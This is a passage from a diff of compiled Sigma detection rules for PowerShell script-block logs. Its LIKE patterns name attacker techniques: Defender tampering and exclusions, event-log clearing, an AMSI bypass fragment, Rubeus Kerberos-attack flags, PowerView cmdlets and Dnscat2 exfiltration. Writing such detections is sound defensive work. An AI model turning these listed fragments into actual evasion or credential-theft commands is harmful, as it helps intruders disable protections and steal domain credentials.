[ - "attack.credential_access", - "attack.t1555" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Legitimate PowerShell scripts" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = 
'4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ScriptBlockText LIKE '%Get-PasswordVaultCredentials%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-CredManCreds%' ESCAPE '\\') OR (ScriptBlockText LIKE '%New-Object%' ESCAPE '\\' AND ScriptBlockText LIKE '%Windows.Security.Credentials.PasswordVault%' ESCAPE '\\') OR (ScriptBlockText LIKE '%New-Object%' ESCAPE '\\' AND ScriptBlockText LIKE '%Microsoft.CSharp.CSharpCodeProvider%' ESCAPE '\\' AND ScriptBlockText LIKE '%[System.Runtime.InteropServices.RuntimeEnvironment]::GetRuntimeDirectory())%' ESCAPE '\\' AND ScriptBlockText LIKE '%Collections.ArrayList%' ESCAPE '\\' AND ScriptBlockText LIKE '%System.CodeDom.Compiler.CompilerParameters%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ScriptBlockText LIKE '%Set-MpPreference%' ESCAPE '\\' AND (ScriptBlockText LIKE '%DisableRealtimeMonitoring 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableBehaviorMonitoring 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableScriptScanning 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableArchiveScanning 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableBlockAtFirstSeen 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableIOAVProtection 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableIntrusionPreventionSystem 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableRemovableDriveScanning 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableScanningMappedNetworkDrivesForFullScan 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableScanningNetworkFiles 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableRealtimeMonitoring $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableBehaviorMonitoring $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableScriptScanning $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableArchiveScanning $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableBlockAtFirstSeen 
$true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableIOAVProtection $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableIntrusionPreventionSystem $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableRemovableDriveScanning $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableScanningMappedNetworkDrivesForFullScan $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableScanningNetworkFiles $true%' ESCAPE '\\')) OR ((ScriptBlockText LIKE '%Set-MpPreference%' ESCAPE '\\' AND ScriptBlockText LIKE '%Allow%' ESCAPE '\\' AND (ScriptBlockText LIKE '%LowThreatDefaultAction%' ESCAPE '\\' OR ScriptBlockText LIKE '%ModerateThreatDefaultAction%' ESCAPE '\\' OR ScriptBlockText LIKE '%HighThreatDefaultAction%' ESCAPE '\\')) OR (ScriptBlockText LIKE '%ltdefac %' ESCAPE '\\' OR ScriptBlockText LIKE '%mtdefac %' ESCAPE '\\' OR ScriptBlockText LIKE '%htdefac %' ESCAPE '\\' OR ScriptBlockText LIKE '%stdefac %' ESCAPE '\\'))))" ], - "filename": "posh_ps_dump_password_windows_credential_manager.yml" + "filename": "posh_ps_tamper_defender.yml" }, { - "title": "Powershell Directory Enumeration", - "id": "162e69a7-7981-4344-84a9-0f1c9a217a52", - "status": "test", - "description": "Detects technique used by MAZE ransomware to enumerate directories using Powershell", - "author": "frack113", + "title": "Suspicious Eventlog Clear", + "id": "0f017df3-8f5a-414f-ad6b-24aff1128278", + "status": "experimental", + "description": "Detects usage of known powershell cmdlets such as \"Clear-EventLog\" to clear the windows event logs", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1083" + "attack.defense_evasion", + "attack.t1070.001" ], "falsepositives": [ - "Legitimate PowerShell scripts" + "Rare need to clear logs before doing something. Sometimes used by installers or cleaner scripts. 
The script should be investigated to determine if it's legitimate" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%foreach%' ESCAPE '\\' AND ScriptBlockText LIKE '%Get-ChildItem%' ESCAPE '\\' AND ScriptBlockText LIKE '%-Path %' ESCAPE '\\' AND ScriptBlockText LIKE '%-ErrorAction %' ESCAPE '\\' AND ScriptBlockText LIKE '%SilentlyContinue%' ESCAPE '\\' AND ScriptBlockText LIKE '%Out-File %' ESCAPE '\\' AND ScriptBlockText LIKE '%-append%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Clear-EventLog %' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-EventLog %' ESCAPE '\\' OR ScriptBlockText LIKE '%Limit-EventLog %' ESCAPE '\\' OR ScriptBlockText LIKE '%Clear-WinEvent %' ESCAPE '\\'))" ], - "filename": "posh_ps_susp_directory_enum.yml" + "filename": "posh_ps_susp_clear_eventlog.yml" }, { - "title": "Password Policy Discovery With Get-AdDefaultDomainPasswordPolicy", - "id": "bbb9495b-58fc-4016-b9df-9a3a1b67ca82", + "title": "Suspicious Invoke-Item From Mount-DiskImage", + "id": "902cedee-0398-4e3a-8183-6f3a89773a96", "status": "test", - "description": "Detetcts PowerShell activity in which Get-Addefaultdomainpasswordpolicy is used to get the default password policy for an Active Directory domain.", + "description": "Adversaries may abuse container files such as disk image (.iso, .vhd) file formats to deliver malicious payloads that may not be tagged with MOTW.", "author": "frack113", "tags": [ - "attack.discovery", - "attack.t1201" + "attack.defense_evasion", + "attack.t1553.005" ], "falsepositives": [ "Legitimate PowerShell scripts" ], - "level": "low", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 
'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Get-AdDefaultDomainPasswordPolicy%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Mount-DiskImage %' ESCAPE '\\' AND ScriptBlockText LIKE '%-ImagePath %' ESCAPE '\\' AND ScriptBlockText LIKE '%Get-Volume%' ESCAPE '\\' AND ScriptBlockText LIKE '%.DriveLetter%' ESCAPE '\\' AND ScriptBlockText LIKE '%invoke-item %' ESCAPE '\\' AND ScriptBlockText LIKE '%):\\\\%' ESCAPE '\\')" ], - "filename": "posh_ps_susp_get_addefaultdomainpasswordpolicy.yml" + "filename": "posh_ps_run_from_mount_diskimage.yml" }, { - "title": "Suspicious PowerShell WindowStyle Option", - "id": "313fbb0a-a341-4682-848d-6d6f8c4fab7c", + "title": "Manipulation of User Computer or Group Security Principals Across AD", + "id": "b29a93fb-087c-4b5b-a84d-ee3309e69d08", "status": "test", - "description": "Adversaries may use hidden windows to conceal malicious activity from the plain sight of users.\nIn some cases, windows that would typically be displayed when an application carries out an operation can be hidden\n", - "author": "frack113, Tim Shelton (fp AWS)", + "description": "Adversaries may create a domain account to maintain access to victim systems.\nDomain accounts are those managed by Active Directory Domain Services where access and permissions are configured across systems and services that are part of that domain..\n", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1564.003" + "attack.persistence", + "attack.t1136.002" ], "falsepositives": [ - "Unknown" + "Legitimate administrative script" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%powershell%' ESCAPE '\\' AND ScriptBlockText LIKE '%WindowStyle%' ESCAPE '\\' AND ScriptBlockText LIKE 
'%Hidden%' ESCAPE '\\') AND NOT (ScriptBlockText LIKE '%:\\\\Program Files\\\\Amazon\\\\WorkSpacesConfig\\\\Scripts\\\\%' ESCAPE '\\' AND ScriptBlockText LIKE '%$PSScriptRoot\\\\Module\\\\WorkspaceScriptModule\\\\WorkspaceScriptModule%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%System.DirectoryServices.AccountManagement%' ESCAPE '\\')" ], - "filename": "posh_ps_susp_windowstyle.yml" + "filename": "posh_ps_directoryservices_accountmanagement.yml" }, { - "title": "Get-ADUser Enumeration Using UserAccountControl Flags", - "id": "96c982fe-3d08-4df4-bed2-eb14e02f21c8", + "title": "Dnscat Execution", + "id": "a6d67db4-6220-436d-8afc-f3842fe05d43", "status": "test", - "description": "Detects AS-REP roasting is an attack that is often-overlooked. It is not very common as you have to explicitly set accounts that do not require pre-authentication.", - "author": "frack113", + "description": "Dnscat exfiltration tool execution", + "author": "Daniil Yugoslavskiy, oscd.community", "tags": [ - "attack.discovery", - "attack.t1033" + "attack.exfiltration", + "attack.t1048", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate PowerShell scripts" + "Legitimate usage of PowerShell Dnscat2 — DNS Exfiltration tool (unlikely)" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Get-ADUser%' ESCAPE '\\' AND ScriptBlockText LIKE '%-Filter%' ESCAPE '\\' AND ScriptBlockText LIKE '%useraccountcontrol%' ESCAPE '\\' AND ScriptBlockText LIKE '%-band%' ESCAPE '\\' AND ScriptBlockText LIKE '%4194304%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText 
LIKE '%Start-Dnscat2%' ESCAPE '\\')" ], - "filename": "posh_ps_as_rep_roasting.yml" + "filename": "posh_ps_dnscat_execution.yml" }, { - "title": "Powershell Detect Virtualization Environment", - "id": "d93129cd-1ee0-479f-bc03-ca6f129882e3", + "title": "Remove Account From Domain Admin Group", + "id": "48a45d45-8112-416b-8a67-46e03a4b2107", "status": "test", - "description": "Adversaries may employ various system checks to detect and avoid virtualization and analysis environments.\nThis may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox\n", - "author": "frack113, Duc.Le-GTSC", + "description": "Adversaries may interrupt availability of system and network resources by inhibiting access to accounts utilized by legitimate users.\nAccounts may be deleted, locked, or manipulated (ex: changed credentials) to remove access to accounts.\n", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1497.001" + "attack.impact", + "attack.t1531" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Get-WmiObject%' ESCAPE '\\' OR ScriptBlockText LIKE '%gwmi%' ESCAPE '\\') AND (ScriptBlockText LIKE '%MSAcpi\\_ThermalZoneTemperature%' ESCAPE '\\' OR ScriptBlockText LIKE '%Win32\\_ComputerSystem%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Remove-ADGroupMember%' ESCAPE '\\' AND ScriptBlockText LIKE '%-Identity %' ESCAPE '\\' AND ScriptBlockText LIKE '%-Members %' ESCAPE '\\')" ], - "filename": "posh_ps_detect_vm_env.yml" + "filename": "posh_ps_susp_remove_adgroupmember.yml" }, { - "title": "Potential PowerShell Obfuscation Using Alias Cmdlets", - "id": 
"96cd126d-f970-49c4-848a-da3a09f55c55", + "title": "Suspicious GetTypeFromCLSID ShellExecute", + "id": "8bc063d5-3a3a-4f01-a140-bc15e55e8437", "status": "experimental", - "description": "Detects Set-Alias or New-Alias cmdlet usage. Which can be use as a mean to obfuscate PowerShell scripts", + "description": "Detects suspicious Powershell code that execute COM Objects", "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.execution", - "attack.t1027", - "attack.t1059.001" + "attack.privilege_escalation", + "attack.persistence", + "attack.t1546.015" ], "falsepositives": [ - "Unknown" + "Legitimate PowerShell scripts" ], - "level": "low", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Set-Alias %' ESCAPE '\\' OR ScriptBlockText LIKE '%New-Alias %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%::GetTypeFromCLSID(%' ESCAPE '\\' AND ScriptBlockText LIKE '%.ShellExecute(%' ESCAPE '\\')" ], - "filename": "posh_ps_susp_set_alias.yml" + "filename": "posh_ps_susp_gettypefromclsid.yml" }, { - "title": "AMSI Bypass Pattern Assembly GetType", - "id": "e0d6c087-2d1c-47fd-8799-3904103c5a98", + "title": "Active Directory Group Enumeration With Get-AdGroup", + "id": "8c3a6607-b7dc-4f0d-a646-ef38c00b76ee", "status": "experimental", - "description": "Detects code fragments found in small and obfuscated AMSI bypass PowerShell scripts", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects usage of the \"Get-AdGroup\" cmdlet to enumerate Groups within Active Directory", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1562.001", - "attack.execution" + "attack.discovery", + "attack.t1069.002" ], "falsepositives": [ "Unknown" ], - "level": "high", + 
"level": "low", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%[Ref].Assembly.GetType%' ESCAPE '\\' AND ScriptBlockText LIKE '%SetValue($null,$true)%' ESCAPE '\\' AND ScriptBlockText LIKE '%NonPublic,Static%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Get-AdGroup %' ESCAPE '\\' AND ScriptBlockText LIKE '%-Filter%' ESCAPE '\\')" ], - "filename": "posh_ps_amsi_bypass_pattern_nov22.yml" + "filename": "posh_ps_get_adgroup.yml" }, { - "title": "Suspicious Get-WmiObject", - "id": "0332a266-b584-47b4-933d-a00b103e1b37", + "title": "Suspicious X509Enrollment - Ps Script", + "id": "504d63cb-0dba-4d02-8531-e72981aace2c", "status": "experimental", - "description": "The infrastructure for management data and operations that enables local and remote management of Windows personal computers and servers", + "description": "Detect use of X509Enrollment", "author": "frack113", - "tags": [ - "attack.persistence", - "attack.t1546" - ], "falsepositives": [ - "Legitimate PowerShell scripts" + "Legitimate administrative script" ], - "level": "low", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%Get-WmiObject%' ESCAPE '\\' OR ScriptBlockText LIKE '%gwmi%' ESCAPE '\\') AND NOT ((Path LIKE '%\\\\CL\\_Utility.ps1' ESCAPE '\\' AND ScriptBlockText LIKE '%function Get-FreeSpace%' ESCAPE '\\' AND ScriptBlockText LIKE '%SELECT % FROM Win32\\_LogicalDisk WHERE MediaType=12%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%X509Enrollment.CBinaryConverter%' ESCAPE 
'\\' OR ScriptBlockText LIKE '%884e2002-217d-11da-b2a4-000e7bbb2b09%' ESCAPE '\\'))" ], - "filename": "posh_ps_susp_gwmi.yml" + "filename": "posh_ps_x509enrollment.yml" }, { - "title": "Remove Account From Domain Admin Group", - "id": "48a45d45-8112-416b-8a67-46e03a4b2107", - "status": "test", - "description": "Adversaries may interrupt availability of system and network resources by inhibiting access to accounts utilized by legitimate users.\nAccounts may be deleted, locked, or manipulated (ex: changed credentials) to remove access to accounts.\n", - "author": "frack113", + "title": "HackTool - Rubeus Execution - ScriptBlock", + "id": "3245cd30-e015-40ff-a31d-5cadd5f377ec", + "status": "experimental", + "description": "Detects the execution of the hacktool Rubeus using specific command line flags", + "author": "Christian Burkard (Nextron Systems), Florian Roth (Nextron Systems)", "tags": [ - "attack.impact", - "attack.t1531" + "attack.credential_access", + "attack.t1003", + "attack.t1558.003", + "attack.lateral_movement", + "attack.t1550.003" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Remove-ADGroupMember%' ESCAPE '\\' AND ScriptBlockText LIKE '%-Identity %' ESCAPE '\\' AND ScriptBlockText LIKE '%-Members %' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%asreproast %' ESCAPE '\\' OR ScriptBlockText LIKE '%dump /service:krbtgt %' ESCAPE '\\' OR ScriptBlockText LIKE '%dump /luid:0x%' ESCAPE '\\' OR ScriptBlockText LIKE '%kerberoast %' ESCAPE '\\' OR ScriptBlockText LIKE '%createnetonly /program:%' ESCAPE '\\' OR ScriptBlockText LIKE '%ptt /ticket:%' ESCAPE '\\' OR ScriptBlockText LIKE '%/impersonateuser:%' ESCAPE '\\' OR 
ScriptBlockText LIKE '%renew /ticket:%' ESCAPE '\\' OR ScriptBlockText LIKE '%asktgt /user:%' ESCAPE '\\' OR ScriptBlockText LIKE '%harvest /interval:%' ESCAPE '\\' OR ScriptBlockText LIKE '%s4u /user:%' ESCAPE '\\' OR ScriptBlockText LIKE '%s4u /ticket:%' ESCAPE '\\' OR ScriptBlockText LIKE '%hash /password:%' ESCAPE '\\' OR ScriptBlockText LIKE '%golden /aes256:%' ESCAPE '\\' OR ScriptBlockText LIKE '%silver /user:%' ESCAPE '\\'))" ], - "filename": "posh_ps_susp_remove_adgroupmember.yml" + "filename": "posh_ps_hktl_rubeus.yml" }, { - "title": "Suspicious PowerShell Mailbox Export to Share - PS", - "id": "4a241dea-235b-4a7e-8d76-50d817b146c4", + "title": "Windows Defender Exclusions Added - PowerShell", + "id": "c1344fa2-323b-4d2e-9176-84b4d4821c88", "status": "experimental", - "description": "Detects usage of the powerShell New-MailboxExportRequest Cmdlet to exports a mailbox to a remote or local share, as used in ProxyShell exploitations", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects modifications to the Windows Defender configuration settings using PowerShell to add exclusions", + "author": "Tim Rauch", "tags": [ - "attack.exfiltration" + "attack.defense_evasion", + "attack.t1562", + "attack.execution", + "attack.t1059" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%New-MailboxExportRequest%' ESCAPE '\\' AND ScriptBlockText LIKE '% -Mailbox %' ESCAPE '\\' AND ScriptBlockText LIKE '% -FilePath \\\\\\\\\\*' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '% -ExclusionPath %' ESCAPE '\\' OR ScriptBlockText LIKE '% -ExclusionExtension %' ESCAPE '\\' OR ScriptBlockText LIKE '% -ExclusionProcess %' 
ESCAPE '\\' OR ScriptBlockText LIKE '% -ExclusionIpAddress %' ESCAPE '\\') AND (ScriptBlockText LIKE '%Add-MpPreference %' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-MpPreference %' ESCAPE '\\'))" ], - "filename": "posh_ps_mailboxexport_share.yml" + "filename": "posh_ps_win_defender_exclusions_added.yml" }, { - "title": "Execution via CL_Invocation.ps1 - Powershell", - "id": "4cd29327-685a-460e-9dac-c3ab96e549dc", - "status": "experimental", - "description": "Detects Execution via SyncInvoke in CL_Invocation.ps1 module", - "author": "oscd.community, Natalia Shornikova", + "title": "Malicious PowerView PowerShell Commandlets", + "id": "dcd74b95-3f36-4ed9-9598-0490951643aa", + "status": "test", + "description": "Detects Commandlet names from PowerView of PowerSploit exploitation framework.", + "author": "Bhabesh Raj", "tags": [ - "attack.defense_evasion", - "attack.t1216" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Unknown" + "Should not be any as administrators do not use this tool" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%CL\\_Invocation.ps1%' ESCAPE '\\' AND ScriptBlockText LIKE '%SyncInvoke%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Add-DomainGroupMember%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-DomainObjectAcl%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-ObjectAcl%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-RemoteConnection%' ESCAPE '\\' OR ScriptBlockText LIKE '%Convert-ADName%' ESCAPE '\\' OR ScriptBlockText LIKE '%ConvertFrom-UACValue%' ESCAPE '\\' OR ScriptBlockText LIKE '%Convert-NameToSid%' ESCAPE '\\' OR ScriptBlockText LIKE '%ConvertTo-SID%' ESCAPE '\\' OR ScriptBlockText LIKE '%Export-PowerViewCSV%' ESCAPE '\\' OR ScriptBlockText LIKE 
'%Find-DomainLocalGroupMember%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-DomainObjectPropertyOutlier%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-DomainProcess%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-DomainShare%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-DomainUserEvent%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-DomainUserLocation%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-ForeignGroup%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-ForeignUser%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-GPOComputerAdmin%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-GPOLocation%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-InterestingDomain%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-InterestingFile%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-LocalAdminAccess%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-ManagedSecurityGroups%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-CachedRDPConnection%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DFSshare%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DNSRecord%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DNSZone%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainComputer%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainController%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainDFSShare%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainDNSRecord%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainDNSZone%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainFileServer%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainGPO%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainGroup%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainGroupMember%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainManagedSecurityGroup%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainObject%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainObjectAcl%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainOU%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainPolicy%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainSID%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainSite%' ESCAPE 
'\\' OR ScriptBlockText LIKE '%Get-DomainSPNTicket%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainSubnet%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainUser%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainUserEvent%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Forest%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-IPAddress%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-LastLoggedOn%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-LoggedOnLocal%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetComputer%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetDomain%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetFileServer%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetForest%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetGPO%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetGroup%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetLocalGroup%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetLoggedon%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetOU%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetProcess%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetRDPSession%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetSession%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetShare%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetSite%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetSubnet%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetUser%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ObjectAcl%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-PathAcl%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Proxy%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RegistryMountedDrive%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RegLoggedOn%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-SiteName%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-UserEvent%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-WMIProcess%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-WMIReg%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ACLScanner%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-CheckLocalAdminAccess%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-EnumerateLocalAdmin%' 
ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-EventHunter%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-FileFinder%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Kerberoast%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-MapDomainTrust%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ProcessHunter%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-RevertToSelf%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ShareFinder%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-UserHunter%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-UserImpersonation%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-DomainGroup%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-DomainUser%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-RemoteConnection%' ESCAPE '\\' OR ScriptBlockText LIKE '%Request-SPNTicket%' ESCAPE '\\' OR ScriptBlockText LIKE '%Resolve-IPAddress%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-ADObject%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-DomainObject%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-DomainUserPassword%' ESCAPE '\\' OR ScriptBlockText LIKE '%Test-AdminAccess%' ESCAPE '\\'))" ], - "filename": "posh_ps_cl_invocation_lolscript.yml" + "filename": "posh_ps_powerview_malicious_commandlets.yml" }, { - "title": "Change PowerShell Policies to an Insecure Level - PowerShell", - "id": "61d0475c-173f-4844-86f7-f3eebae1c66b", - "status": "experimental", - "description": "Detects use of Set-ExecutionPolicy to set insecure policies", + "title": "Powershell WMI Persistence", + "id": "9e07f6e7-83aa-45c6-998e-0af26efd0a85", + "status": "test", + "description": "Adversaries may establish persistence and elevate privileges by executing malicious content triggered by a Windows Management Instrumentation (WMI) event subscription.", "author": "frack113", 